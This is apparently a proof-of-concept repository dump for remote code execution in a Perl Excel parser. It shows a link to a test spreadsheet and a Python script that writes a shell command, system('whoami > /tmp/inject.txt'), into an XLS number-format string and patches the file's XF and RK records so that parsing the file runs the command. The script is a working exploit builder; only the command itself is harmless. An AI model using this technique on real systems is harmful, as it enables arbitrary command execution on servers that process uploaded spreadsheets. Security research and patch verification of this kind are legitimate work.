-------------------------------------------------------------------------------- /poc/rce/test.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xlsx -------------------------------------------------------------------------------- /poc/xls-payload.py: -------------------------------------------------------------------------------- 1 | # Inject shell to format string 2 | shell = "system('whoami > /tmp/inject.txt')" 3 | fmtStr = f'[>123;{shell}]123' 4 | pattern = f'"{"a" * (len(fmtStr) - 2)}"' 5 | print(pattern) 6 | input() 7 | 8 | xls = open('test.xls', 'rb').read() 9 | 10 | l = xls.index(pattern.encode()) 11 | assert l != -1 #Pattern must exist 12 | r = l + len(pattern) 13 | 14 | fmtIdx = xls[l - 5:l - 3] 15 | payload_len = len(fmtStr) 16 | 17 | xls = xls[:l] + fmtStr.encode() + xls[r:] 18 | 19 | # Apply format string to xf 20 | XF_opcode_w_len = b'\xe0\x00\x14\x00' # Assume highest BIFF version 21 | l = xls.index(XF_opcode_w_len) # First means format index = 0 22 | assert l != -1 # XF must exist 23 | xls = xls[:l + 6] + fmtIdx + xls[l + 8:] 24 | 25 | # Apply format to cell 26 | RK_opcode = b'\x7e\x02' 27 | l = xls.index(RK_opcode) 28 | assert l != -1 # Date must exist 29 | l += 8 30 | 31 | xls = xls[:l] + b'\x00\x00' + xls[l + 2:] # format index 0 32 | 33 | open('test.xls', 'wb').write(xls) 34 | --------------------------------------------------------------------------------